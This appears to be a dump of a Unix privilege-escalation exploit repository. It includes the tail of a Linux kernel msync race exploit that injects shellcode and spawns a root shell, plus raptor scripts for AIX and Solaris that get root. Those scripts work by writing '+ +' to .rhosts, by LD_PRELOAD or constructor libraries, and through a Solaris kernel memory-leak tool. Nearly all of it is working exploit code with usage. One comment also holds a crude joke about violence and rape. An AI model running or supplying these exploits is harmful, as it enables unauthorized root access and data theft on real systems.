{ while (!gotsig) pause(); gotsig = 0; } 188 | 189 | #define PAGE_DOWN(x) (x & ~(PAGE_SIZE-1)) 190 | #define PAGE_ALIGN(x) ((x+PAGE_SIZE-1) & ~(PAGE_SIZE-1)) 191 | 192 | #undef O_DIRECT 193 | #define O_DIRECT 0 194 | 195 | struct libimg { 196 | Elf32_Ehdr elf; 197 | Elf32_Phdr ph; 198 | }; 199 | 200 | 201 | struct dentry_struct { 202 | unsigned dummy0, dummy1; 203 | void *inode1, *inode2; 204 | }; 205 | 206 | struct file_struct { 207 | struct file_struct *next, *prev; 208 | void *dentry; 209 | void *mnt; 210 | void *op; 211 | void *f_mapping[64]; /* somewhere in there is f_mapping on 2.6 */ 212 | }; 213 | 214 | /* this should roughly cover 2.4* and 2.6* */ 215 | struct vma_struct { 216 | void *mm; 217 | unsigned long vm_start; 218 | unsigned long vm_end; 219 | struct vma_struct *vm_next; 220 | unsigned long pgprot; 221 | unsigned long vmflags; 222 | char rb[16]; 223 | void *shared_next, *shared_prev; 224 | void *vm_ops; 225 | unsigned long pgoff; 226 | void *file; 227 | void *priv; 228 | }; 229 | 230 | struct mm_struct { 231 | struct vma_struct *mmap; 232 | void *rb; 233 | struct vma_struct *cache; 234 | void *pgd1; 235 | void *pgd2; 236 | void *pgd3; 237 | /* somewhere there lies the spinlock */ 238 | unsigned long locks[32]; 239 | }; 240 | 241 | 242 | /* the image of the evil library. */ 243 | struct libimg limg = { 244 | { 245 | e_ident: "\177ELF", 246 | e_type: ET_EXEC, 247 | e_machine: EM_386, 248 | e_phoff: sizeof(Elf32_Ehdr), 249 | e_ehsize: sizeof(Elf32_Ehdr), 250 | e_phentsize: sizeof(Elf32_Phdr), 251 | e_phnum: 1 252 | }, 253 | { 254 | p_type: PT_LOAD, 255 | p_vaddr: 0, 256 | p_memsz: 0 257 | } 258 | }; 259 | 260 | static void make_lib(char *name) 261 | { 262 | int libfd = open(name, O_CREAT|O_RDWR|O_TRUNC, 0700); 263 | write(libfd, &limg, sizeof(limg)); 264 | fchmod(libfd, 0700); 265 | } 266 | 267 | 268 | static char thread_stack[16384]; 269 | int fd1, fd2, fd3; 270 | char buf[MAPSTEP]; 271 | int notincore; 272 | int t4; 273 | int t3; 274 | int t2; 275 | int bigsize = 0; 276 | char *bigmem = NULL; 277 | int swapsize = 0; 278 | char *swapmem = NULL; 279 | char *base = BASE; 280 | char *vmamem; 281 | int gotsig = 0; 282 | int sem = 0; 283 | 284 | #define cleanup() _cleanup(__func__, __LINE__) 285 | void killall() 286 | { 287 | if (t2 != getpid()) 288 | kill(t2, SIGKILL); 289 | if (t3 != getpid()) 290 | kill(t3, SIGKILL); 291 | if (t4 != getpid()) 292 | kill(t4, SIGKILL); 293 | } 294 | void _cleanup(const char *name, int line) 295 | { 296 | printf("cleanup called! from %s:%d\n", name, line); 297 | killall(); 298 | unlink(SHAREFILE); 299 | unlink(SWAPFILE); 300 | unlink(EATFILES); 301 | unlink(EATFILE); 302 | unlink(LIBFILE); 303 | _exit(1); 304 | } 305 | 306 | 307 | #define FAKES_BASE 0x50000000 308 | 309 | struct fakes { 310 | int t1; 311 | struct mm_struct mm; 312 | struct vma_struct vma; 313 | struct file_struct file; 314 | struct dentry_struct dentry; 315 | unsigned long mapping24[128]; 316 | unsigned long mapping26[128]; 317 | unsigned long inode[128]; 318 | unsigned long pgd[1024]; 319 | void *ptrs[128]; 320 | char shellcode[sizeof(shellcode)]; 321 | int t2; 322 | }; 323 | 324 | struct fakes *fakes = (void *) FAKES_BASE; 325 | 326 | 327 | /* build the fake vma which msync_interval will get 328 | * we've to emulate a lot of things! 329 | */ 330 | void build_fakevma() 331 | { 332 | int i; 333 | memset(fakes, 0, sizeof(*fakes)); 334 | fakes->vma.vm_end = (unsigned)( base + PAGE_SIZE * 2); 335 | fakes->vma.vm_start = (unsigned)(base + PAGE_SIZE); 336 | /* we need this to let the kernel enter the fs callback we control */ 337 | fakes->vma.vmflags = 0xf; 338 | fakes->vma.file = &fakes->file; 339 | fakes->vma.mm = &fakes->mm; 340 | 341 | fakes->mm.pgd1 = fakes->pgd; 342 | fakes->mm.pgd2 = fakes->pgd; 343 | fakes->mm.pgd3 = fakes->pgd; 344 | /* there are no pmd's */ 345 | memset(fakes->pgd, 0, sizeof(fakes->pgd)); 346 | /* initialize potential spinlock on smp */ 347 | for (i = 0; i < 32; i++) 348 | fakes->mm.locks[i] = 1; 349 | /* 2.4 goes thru dentry */ 350 | fakes->file.dentry = &fakes->dentry; 351 | fakes->dentry.inode1 = fakes->inode; 352 | fakes->dentry.inode2 = fakes->inode; 353 | /* this will be i_sem */ 354 | for (i = 0; i < 32; i++) 355 | fakes->inode[i] = 1; 356 | /* and this reference to i_mapping */ 357 | for (i = 32; i < 128; i++) 358 | fakes->inode[i] = (unsigned long) fakes->mapping24; 359 | 360 | /* 2.6 goes thru f_mapping */ 361 | for (i = 0; i < 64; i++) 362 | fakes->file.f_mapping[i] = fakes->mapping26; 363 | 364 | /* prepare mmappings for both 2.4 and 2.6 */ 365 | 366 | /* mapping on 2.6 requieres to have ->host defined. 367 | and backing_dev_info pointing to bunch of nonzero memory. 368 | also locked_pages list must point to itself (empty) */ 369 | fakes->mapping26[0] = (unsigned long) fakes->inode; 370 | for (i = 1; i <= 3; i++) 371 | fakes->mapping26[i] = 0; 372 | for (i = 4; i < 16; i++) 373 | fakes->mapping26[i] = (unsigned long) &fakes->mapping26[i]; 374 | for (i = 16; i <= 30; i++) 375 | fakes->mapping26[i] = (unsigned long) fakes->ptrs; 376 | 377 | /* mapping on 2.4 requieres only having mapping consisting of empty lists */ 378 | for (i = 0; i <= 30; i++) 379 | fakes->mapping24[i] = (unsigned long) &fakes->mapping24[i]; 380 | for (i = 23; i <= 30; i++) 381 | fakes->mapping24[i] = (unsigned long) fakes->ptrs; 382 | 383 | /* ok, now setup fops->f_sync to our evil fsync */ 384 | fakes->file.op = fakes->ptrs; 385 | for (i = 0; i < 128; i++) 386 | fakes->ptrs[i] = fakes->shellcode; 387 | memcpy(fakes->shellcode, shellcode, sizeof(shellcode)); 388 | } 389 | 390 | void create_fakepage(void *buf) 391 | { 392 | int i; 393 | void *vma = &fakes->vma; 394 | void **p = buf; 395 | 396 | for (i = 0; i < MAPSTEP; i += sizeof(void *)) 397 | *p++ = vma; /* !!! */ 398 | } 399 | 400 | 401 | static void sighand(int d) 402 | { 403 | gotsig = 1; 404 | } 405 | 406 | 407 | static int thread(void *d) 408 | { 409 | int t3; 410 | int ret; 411 | int i; 412 | 413 | wait4sig(); 414 | printf("(sleep1)\n"); 415 | usleep(300000); 416 | printf("(sleep1 finished)\n"); 417 | printf("trying to mmap back the evil page\n"); 418 | for (i = 0; i < VMAFILL; i++) { 419 | if (i == VMAFILL/2) 420 | ret=mmap(swapmem + PAGE_SIZE * 2, PAGE_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0); 421 | mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE, PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)), 422 | MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); 423 | } 424 | swapmem[PAGE_SIZE*2] = 'x'; 425 | printf("%p, evil mapped\n",ret); 426 | printf("(sleep2)\n"); 427 | if (sem) 428 | cleanup(); 429 | sendsig(t3); 430 | usleep(300000); 431 | printf("(sleep2 finished)\n"); 432 | if (sem) 433 | cleanup(); 434 | munmap(vmamem, VMAFILL * PAGE_SIZE); 435 | printf("doing msync\n"); 436 | printf("still doing msync\n"); 437 | ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC); 438 | printf("finished msync, %d, errno=%d\n", ret, errno); 439 | if (ret == -1 && errno == 123) { 440 | sem = 0; 441 | killall(); 442 | printf("y4'r3 1uCky k1d!\n"); 443 | setresuid(0, 0, 0); 444 | setresgid(0, 0, 0); 445 | execl("/bin/sh", "sh", "-i", NULL); 446 | printf("execve failed %d\n", errno); 447 | } 448 | if (!sem) { 449 | printf(":(\n"); 450 | cleanup(); 451 | } 452 | _exit(0); 453 | } 454 | 455 | int main(int argc, char *argv[]) 456 | { 457 | int i, n; 458 | char *dummy = DBASE; 459 | 460 | printf("linux kernel msync race condition\nbug discovered by sd, 461 | further research by sd and *****\nthis is development-in-progress code, 462 | redistribution prohibited!\n=============================================\n"); 463 | 464 | signal(SIGUSR1, sighand); 465 | signal(SIGALRM, sighand); 466 | setbuf(stdout, NULL); 467 | 468 | i = open(SHAREFILE, O_CREAT|O_RDWR|O_TRUNC, 0777); 469 | 470 | mmap(FAKES_BASE, PAGE_ALIGN(sizeof(*fakes)), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED, i,0); 471 | ftruncate(i, PAGE_ALIGN(sizeof(*fakes))); 472 | build_fakevma(); 473 | t4 = fork(); 474 | if (!t4) { 475 | while (1) { 476 | fakes->t1++; 477 | fakes->t2++; 478 | sched_yield(); 479 | } 480 | } 481 | printf("creating fakepage\n"); 482 | create_fakepage(buf); 483 | i = open(DUMMYFILE,O_CREAT|O_RDWR|O_TRUNC, 0777); 484 | ftruncate(i, MAPSTEP); 485 | write(i, buf, MAPSTEP); 486 | for (n = 0; n < MEMSZ; n += MAPSTEP) 487 | mmap(dummy + n, MAPSTEP, PROT_READ|PROT_WRITE, MAP_SHARED, i, 0); 488 | 489 | fd3 = open(EATFILE, O_CREAT|O_RDWR|O_TRUNC, 0777); 490 | ftruncate(fd3, 16384); 491 | /* create the source junkfile */ 492 | fd1 = open(EATFILES, O_CREAT|O_RDWR|O_TRUNC, 0777); 493 | alarm(EATTIME); 494 | printf("done fakepage\n"); 495 | do { 496 | int c; 497 | c = write(fd1, buf, MAPSTEP); 498 | if (c < MAPSTEP) 499 | break; 500 | bigsize += c; 501 | printf("done %d Kb\r", bigsize / 1024); 502 | } while (!gotsig); 503 | printf("\n"); 504 | alarm(0); 505 | gotsig = 0; 506 | bigmem = mmap(base - bigsize, bigsize, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_SHARED, fd1, 0); 507 | if (bigmem == MAP_FAILED) 508 | cleanup(); 509 | 510 | t3 = fork(); 511 | 512 | if (!t3) { 513 | wait4sig(); 514 | printf("starting aggresive write!\n"); 515 | write(fd3, bigmem, bigsize); 516 | printf("done aggresive write!\n"); 517 | _exit(0); 518 | } 519 | 520 | t2 = clone(thread, thread_stack + sizeof(thread_stack) - 4, 521 | 0xf00, NULL); 522 | 523 | swapmem = base; 524 | if (mmap(swapmem, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0) 525 | == MAP_FAILED) cleanup(); 526 | 527 | /* create the swap */ 528 | printf("creating swapfile\n"); 529 | fd2 = open(SWAPFILE, O_CREAT|O_RDWR|O_TRUNC, 0777); 530 | ftruncate(fd2, MEMSZ); 531 | vmamem = swapmem + MEMSZ + 16*PAGE_SIZE; 532 | // base += VMAFILL * PAGE_SIZE; 533 | 534 | printf("vmamem = %p\n", vmamem); 535 | mmap(swapmem + PAGE_SIZE, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, fd2, 0); 536 | printf("swapmem = %p, swapsize = %d\n", swapmem, 2*PAGE_SIZE); 537 | // getchar(); 538 | 539 | // munmap(vmamem, VMAFILL * PAGE_SIZE); 540 | 541 | write(fd2, dummy, MEMSZ); 542 | close(fd2); 543 | 544 | printf("unlink\n"); 545 | unlink(SWAPFILE); 546 | 547 | 548 | // core_stat(); 549 | 550 | build_fakevma(); 551 | sendsig(t2); 552 | limg.ph.p_vaddr = (unsigned) swapmem + PAGE_SIZE; 553 | limg.ph.p_memsz = PAGE_SIZE * 2; 554 | make_lib(LIBFILE); 555 | printf("started uselib\n"); 556 | time_start(); 557 | uselib(LIBFILE); 558 | // munmap(swapmem + PAGE_SIZE, PAGE_SIZE); 559 | time_end(); 560 | printf("uselib finished!\n"); 561 | sem = 1; 562 | printf("pid %d\n",getpid()); 563 | // core_stat(); 564 | n = 0; 565 | n = waitpid(t2, NULL, __WCLONE); 566 | printf("waitpid got %d/%d\n", n, errno); 567 | // killall(); 568 | cleanup(); 569 | } -------------------------------------------------------------------------------- /pwned.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/pwned.zip -------------------------------------------------------------------------------- /r00t.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/r00t.zip -------------------------------------------------------------------------------- /raptor.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/raptor.zip -------------------------------------------------------------------------------- /raptor_libC.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # $Id: raptor_libC,v 1.2 2009/09/15 07:35:47 raptor Exp $ 5 | # 6 | # raptor_libC - AIX arbitrary file overwrite via libC debug 7 | # Copyright (c) 2009 Marco Ivaldi 8 | # 9 | # Property of @ Mediaservice.net Srl Data Security Division 10 | # http://www.mediaservice.net/ http://lab.mediaservice.net/ 11 | # 12 | # *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING *** 13 | # 14 | # A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle 15 | # the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which 16 | # allows local users to gain privileges by leveraging a setuid-root program to 17 | # create an arbitrary root-owned file with world-writable permissions, related 18 | # to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1 19 | # (CVE-2009-2669). 20 | # 21 | # Typical privilege escalation techniques via arbitrary file creation don't 22 | # seem to work on recent AIX versions: .rhosts is ignored if it is group or 23 | # world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries; 24 | # /var/spool/cron/atjobs seems useless as well, since we cannot open cron's 25 | # named pipe /var/adm/cron/FIFO; similarly, /root/.ssh/authorized_keys is not 26 | # usable, because of the permissions (700) usually set on the directory. Other 27 | # viable exploitation vectors that come to mind, depending on the target box 28 | # setup, are: /root/{.profile,.kshrc,...}, /etc/rc.d/, and PATH abuse. 29 | # 30 | # See also: http://milw0rm.com/exploits/9306 31 | # 32 | # Usage: 33 | # $ uname -a 34 | # AIX rs6000 3 5 0052288E4C00 35 | # $ lslpp -L xlC.rte | grep xlC.rte 36 | # xlC.rte 9.0.0.1 C F XL C/C++ Runtime 37 | # $ chmod +x raptor_libC 38 | # $ ./raptor_libC /bin/bobobobobob 39 | # [...] 40 | # -rw-rw-rw- 1 root staff 63 Sep 10 09:55 /bin/bobobobobob 41 | # 42 | # Vulnerable platforms (AIX 5.3): 43 | # xlC.rte < 8.0.0.0 [untested] 44 | # xlC.rte 8.0.0.0-8.0.0.14 [untested] 45 | # xlC.rte 9.0.0.0-9.0.0.9 [tested] 46 | # xlC.rte 10.1.0.0-10.1.0.2 [untested] 47 | # 48 | # Vulnerable platforms (AIX 6.1): 49 | # bos.rte.libc 6.1.0.0-6.1.0.11 [untested] 50 | # bos.rte.libc 6.1.1.0-6.1.1.6 [untested] 51 | # bos.rte.libc 6.1.2.0-6.1.2.5 [untested] 52 | # bos.rte.libc 6.1.3.0-6.1.3.2 [untested] 53 | # bos.adt.prof 6.1.0.0-6.1.0.10 [untested] 54 | # bos.adt.prof 6.1.1.0-6.1.1.5 [untested] 55 | # bos.adt.prof 6.1.2.0-6.1.2.4 [untested] 56 | # bos.adt.prof 6.1.3.0-6.1.3.1 [untested] 57 | # 58 | 59 | echo "raptor_libC - AIX arbitrary file overwrite via libC debug" 60 | echo "Copyright (c) 2009 Marco Ivaldi " 61 | echo 62 | 63 | # check the arguments 64 | if [ -z "$1" ]; then 65 | echo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***" 66 | echo 67 | echo "Usage: $0 " 68 | echo 69 | exit 70 | fi 71 | 72 | # prepare the environment 73 | _LIB_INIT_DBG=1 74 | _LIB_INIT_DBG_FILE=$1 75 | export _LIB_INIT_DBG _LIB_INIT_DBG_FILE 76 | 77 | # gimme -rw-rw-rw-! 78 | umask 0 79 | 80 | # setuid program linked to /usr/lib/libC.a 81 | /usr/dt/bin/dtappgather 82 | 83 | # other good setuid targets 84 | # /usr/dt/bin/dtprintinfo 85 | # /opt/IBMinvscout/bin/invscoutClient_VPD_Survey 86 | 87 | # check the created file 88 | ls -l $_LIB_INIT_DBG_FILE 89 | echo 90 | -------------------------------------------------------------------------------- /raptor_libnspr.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # $Id: raptor_libnspr,v 1.4 2006/10/24 15:54:57 raptor Exp $ 5 | # 6 | # raptor_libnspr - Solaris 10 libnspr oldschool local root 7 | # Copyright (c) 2006 Marco Ivaldi 8 | # 9 | # Local exploitation of a design error vulnerability in version 4.6.1 of 10 | # NSPR, as included with Sun Microsystems Solaris 10, allows attackers to 11 | # create or overwrite arbitrary files on the system. The problem exists 12 | # because environment variables are used to create log files. Even when the 13 | # program is setuid, users can specify a log file that will be created with 14 | # elevated privileges (CVE-2006-4842). 15 | # 16 | # Usage: 17 | # $ chmod +x raptor_libnspr 18 | # $ ./raptor_libnspr 19 | # [...] 20 | # # id 21 | # uid=0(root) gid=0(root) 22 | # # rm /.rhosts 23 | # # 24 | # 25 | # Vulnerable platforms (SPARC): 26 | # Solaris 10 without patch 119213-10 [tested] 27 | # 28 | # Vulnerable platforms (x86): 29 | # Solaris 10 without patch 119214-10 [untested] 30 | # 31 | 32 | echo "raptor_libnspr - Solaris 10 libnspr oldschool local root" 33 | echo "Copyright (c) 2006 Marco Ivaldi " 34 | echo 35 | 36 | # prepare the environment 37 | NSPR_LOG_MODULES=all:5 38 | NSPR_LOG_FILE=/.rhosts 39 | export NSPR_LOG_MODULES NSPR_LOG_FILE 40 | 41 | # gimme -rw-rw-rw-! 42 | umask 0 43 | 44 | # setuid program linked to /usr/lib/mps/libnspr4.so 45 | /usr/bin/chkey 46 | 47 | # other good setuid targets 48 | #/usr/bin/passwd 49 | #/usr/bin/lp 50 | #/usr/bin/cancel 51 | #/usr/bin/lpset 52 | #/usr/bin/lpstat 53 | #/usr/lib/lp/bin/netpr 54 | #/usr/sbin/lpmove 55 | #/usr/bin/su 56 | #/usr/bin/mailq 57 | 58 | # oldschool rhosts foo;) 59 | echo "+ +" > $NSPR_LOG_FILE 60 | rsh -l root localhost sh -i 61 | -------------------------------------------------------------------------------- /raptor_libnspr2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # $Id: raptor_libnspr2,v 1.6 2006/10/24 15:54:57 raptor Exp $ 5 | # 6 | # raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit 7 | # Copyright (c) 2006 Marco Ivaldi 8 | # 9 | # Local exploitation of a design error vulnerability in version 4.6.1 of 10 | # NSPR, as included with Sun Microsystems Solaris 10, allows attackers to 11 | # create or overwrite arbitrary files on the system. The problem exists 12 | # because environment variables are used to create log files. Even when the 13 | # program is setuid, users can specify a log file that will be created with 14 | # elevated privileges (CVE-2006-4842). 15 | # 16 | # Newschool version of local root exploit via LD_PRELOAD (hi KF!). Other 17 | # possible (but less l33t;) attack vectors are: /var/spool/cron/atjobs, 18 | # /root/.ssh/authorized_keys, /root/.bash{rc,_profile,logout}, /etc/rc?.d. 19 | # 20 | # See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr 21 | # 22 | # Usage: 23 | # $ chmod +x raptor_libnspr2 24 | # $ ./raptor_libnspr2 25 | # [...] 26 | # Sun Microsystems Inc. SunOS 5.10 Generic January 2005 27 | # # id 28 | # uid=0(root) gid=0(root) 29 | # # rm /usr/lib/secure/getuid.so 30 | # # 31 | # 32 | # Vulnerable platforms (SPARC): 33 | # Solaris 10 without patch 119213-10 [tested] 34 | # 35 | # Vulnerable platforms (x86): 36 | # Solaris 10 without patch 119214-10 [untested] 37 | # 38 | 39 | echo "raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit" 40 | echo "Copyright (c) 2006 Marco Ivaldi " 41 | echo 42 | 43 | # prepare the environment 44 | NSPR_LOG_MODULES=all:5 45 | NSPR_LOG_FILE=/usr/lib/secure/getuid.so 46 | export NSPR_LOG_MODULES NSPR_LOG_FILE 47 | 48 | # gimme -rw-rw-rw-! 49 | umask 0 50 | 51 | # setuid program linked to /usr/lib/mps/libnspr4.so 52 | /usr/bin/chkey 53 | 54 | # other good setuid targets 55 | #/usr/bin/passwd 56 | #/usr/bin/lp 57 | #/usr/bin/cancel 58 | #/usr/bin/lpset 59 | #/usr/bin/lpstat 60 | #/usr/lib/lp/bin/netpr 61 | #/usr/sbin/lpmove 62 | #/usr/bin/su 63 | #/usr/bin/mailq 64 | 65 | # prepare the evil shared library 66 | echo "int getuid(){return 0;}" > /tmp/getuid.c 67 | gcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc 68 | if [ $? -ne 0 ]; then 69 | echo "problems compiling evil shared library, check your gcc" 70 | exit 1 71 | fi 72 | 73 | # newschool LD_PRELOAD foo;) 74 | unset NSPR_LOG_MODULES NSPR_LOG_FILE 75 | LD_PRELOAD=/usr/lib/secure/getuid.so su - 76 | -------------------------------------------------------------------------------- /raptor_libnspr3.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $ 5 | # 6 | # raptor_libnspr3 - Solaris 10 libnspr constructor exploit 7 | # Copyright (c) 2006 Marco Ivaldi 8 | # 9 | # Local exploitation of a design error vulnerability in version 4.6.1 of 10 | # NSPR, as included with Sun Microsystems Solaris 10, allows attackers to 11 | # create or overwrite arbitrary files on the system. The problem exists 12 | # because environment variables are used to create log files. Even when the 13 | # program is setuid, users can specify a log file that will be created with 14 | # elevated privileges (CVE-2006-4842). 15 | # 16 | # Yet another newschool version of the local root exploit: this time we place 17 | # our code in the global constructor (ctors) for the library, as suggested by 18 | # gera. This way, we don't have to hide a real function and we have a generic 19 | # library that can be used in all exploits like this. To avoid annoying side- 20 | # effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing 21 | # a library in the default search path. 22 | # 23 | # See also: 24 | # http://www.0xdeadbeef.info/exploits/raptor_libnspr 25 | # http://www.0xdeadbeef.info/exploits/raptor_libnspr2 26 | # 27 | # Usage: 28 | # $ chmod +x raptor_libnspr3 29 | # $ ./raptor_libnspr3 30 | # [...] 31 | # Sun Microsystems Inc. SunOS 5.10 Generic January 2005 32 | # # id 33 | # uid=0(root) gid=1(other) 34 | # # rm /usr/lib/secure/libldap.so.5 35 | # # 36 | # 37 | # Vulnerable platforms (SPARC): 38 | # Solaris 10 without patch 119213-10 [tested] 39 | # 40 | # Vulnerable platforms (x86): 41 | # Solaris 10 without patch 119214-10 [untested] 42 | # 43 | 44 | echo "raptor_libnspr3 - Solaris 10 libnspr constructor exploit" 45 | echo "Copyright (c) 2006 Marco Ivaldi " 46 | echo 47 | 48 | # prepare the environment 49 | NSPR_LOG_MODULES=all:5 50 | NSPR_LOG_FILE=/usr/lib/secure/libldap.so.5 51 | export NSPR_LOG_MODULES NSPR_LOG_FILE 52 | 53 | # gimme -rw-rw-rw-! 54 | umask 0 55 | 56 | # setuid program linked to /usr/lib/mps/libnspr4.so 57 | /usr/bin/chkey 58 | 59 | # other good setuid targets 60 | #/usr/bin/passwd 61 | #/usr/bin/lp 62 | #/usr/bin/cancel 63 | #/usr/bin/lpset 64 | #/usr/bin/lpstat 65 | #/usr/lib/lp/bin/netpr 66 | #/usr/sbin/lpmove 67 | #/usr/bin/su 68 | #/usr/bin/mailq 69 | 70 | # prepare the evil shared library 71 | echo "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c 72 | echo " setuid(0);" >> /tmp/ctors.c 73 | echo " execle(\"/bin/ksh\", \"ksh\", 0, 0);" >> /tmp/ctors.c 74 | echo "}" >> /tmp/ctors.c 75 | gcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc 76 | if [ $? -ne 0 ]; then 77 | echo "problems compiling evil shared library, check your gcc" 78 | exit 1 79 | fi 80 | 81 | # newschool LD_LIBRARY_PATH foo;) 82 | unset NSPR_LOG_MODULES NSPR_LOG_FILE 83 | LD_LIBRARY_PATH=/usr/lib/secure su - 84 | -------------------------------------------------------------------------------- /raptor_peek.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $Id: raptor_peek.c,v 1.1 2007/10/18 08:09:02 raptor Exp $ 3 | * 4 | * raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak 5 | * Copyright (c) 2007 Marco Ivaldi 6 | * 7 | * [Lame] integer signedness error in FIFO filesystems (named pipes) on Sun 8 | * Solaris 8 through 10 allows local users to read the contents of unspecified 9 | * memory locations via a negative value to the I_PEEK ioctl (CVE-2007-5225). 10 | * 11 | * /\ AS PART OF A VAST WORLD-WIDE CONSPIRACY 12 | * hjm / \ I COMMAND THEE: BEAT OFF UNTO ME 13 | * /,--.\ 14 | * /< () >\ IF I SAY "FNORD" AT THE END OF A SENTENCE 15 | * / `--' \ DOES THAT MAKE ME REALLY FUNNY OR SOMEONE 16 | * / \ WHO NEEDS TO GET FUCKING BEATEN TO NEAR 17 | * / \ DEATH AND THEN RAPED WITH A BROOM 18 | * /______________\ 19 | * AS YOU CAN SEE THAT'S REALLY TWO JOKES IN ONE 20 | * SO YOU REALLY GET YOUR MONEY'S WORTH HERE 21 | * Usage: 22 | * $ gcc raptor_peek.c -o raptor_peek -Wall 23 | * $ ./raptor_peek kerndump 666666 24 | * [...] 25 | * $ ls -l kerndump 26 | * -rwx------ 1 raptor staff 666666 Oct 17 19:33 kerndump 27 | * 28 | * Vulnerable platforms (SPARC): 29 | * Solaris 8 without patch 109454-06 [tested] 30 | * Solaris 9 without patch 117471-04 [tested] 31 | * Solaris 10 without patch 127737-01 [tested] 32 | * 33 | * Vulnerable platforms (x86): 34 | * Solaris 8 without patch 109455-06 [untested] 35 | * Solaris 9 without patch 117472-04 [untested] 36 | * Solaris 10 without patch 127738-01 [untested] 37 | */ 38 | 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | 48 | #define INFO1 "raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak" 49 | #define INFO2 "Copyright (c) 2007 Marco Ivaldi " 50 | 51 | #define BADFIFO "/tmp/fnord" 52 | #define BUFSIZE 1000000 53 | 54 | int errno; 55 | 56 | int main(int argc, char **argv) 57 | { 58 | int fd, fifo; 59 | size_t out, bufsize = BUFSIZE; 60 | char *buf; 61 | struct strpeek peek; 62 | 63 | /* print exploit information */ 64 | fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); 65 | 66 | /* read command line */ 67 | if (argc < 2) { 68 | fprintf(stderr, "usage: %s outfile [outsize]\n\n", argv[0]); 69 | exit(1); 70 | } 71 | if (argc > 2) 72 | if ((bufsize = atoi(argv[2])) == 0) { 73 | fprintf(stderr, "Error (atoi): invalid outsize\n"); 74 | exit(1); 75 | } 76 | 77 | /* print some output */ 78 | fprintf(stderr, "Using outfile\t: %s\n", argv[1]); 79 | fprintf(stderr, "Using outsize\t: %u\n\n", bufsize); 80 | 81 | /* prepare the output buffer */ 82 | if ((buf = (char *)malloc(bufsize)) == NULL) { 83 | perror("Error (malloc)"); 84 | fprintf(stderr, "Hint: Try again with a smaller output size\n"); 85 | exit(1); 86 | } 87 | memset(buf, 0, bufsize); 88 | 89 | /* create the named pipe */ 90 | unlink(BADFIFO); 91 | if (mknod(BADFIFO, S_IFIFO | S_IRWXU, 0) < 0) { 92 | perror("Error (mknod)"); 93 | exit(1); 94 | } 95 | 96 | switch(fork()) { 97 | case -1: /* cannot fork */ 98 | perror("Error (fork)"); 99 | exit(1); 100 | case 0: /* the child writes */ 101 | if ((fifo = open(BADFIFO, O_WRONLY, 0)) < 0) { 102 | perror("Error (open)"); 103 | exit(1); 104 | } 105 | write(fifo, "FNORD", 5); 106 | exit(0); 107 | default: /* the parent reads */ 108 | /* FALL THROUGH */ 109 | ; 110 | } 111 | 112 | /* perform the MAGICK */ 113 | if ((fifo = open(BADFIFO, O_RDONLY, 0)) < 0) { 114 | perror("Error (open)"); 115 | exit(1); 116 | } 117 | 118 | memset(&peek, 0, sizeof(peek)); 119 | peek.databuf.buf = buf; 120 | peek.databuf.maxlen = -1; /* FNORD! */ 121 | 122 | if (ioctl(fifo, I_PEEK, &peek) < 0 ) { 123 | perror("Error (ioctl)"); 124 | close(fifo); 125 | exit(1); 126 | } 127 | 128 | /* save output to outfile */ 129 | if ((fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0700)) < 0) { 130 | perror("Error (open)"); 131 | close(fifo); 132 | exit(1); 133 | } 134 | out = write(fd, buf, bufsize); 135 | 136 | fprintf(stderr, "FNORD! %u bytes written to %s\n", out, argv[1]); 137 | fprintf(stderr, "Hint: Try also with a bigger output size\n"); 138 | 139 | /* cleanup (who cares about free?;) */ 140 | close(fd); 141 | close(fifo); 142 | 143 | exit(0); 144 | } 145 | -------------------------------------------------------------------------------- /raptor_sysinfo.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $Id: raptor_sysinfo.c,v 1.2 2006/08/22 13:47:54 raptor Exp $ 3 | * 4 | * raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak 5 | * Copyright (c) 2006 Marco Ivaldi 6 | * 7 | * 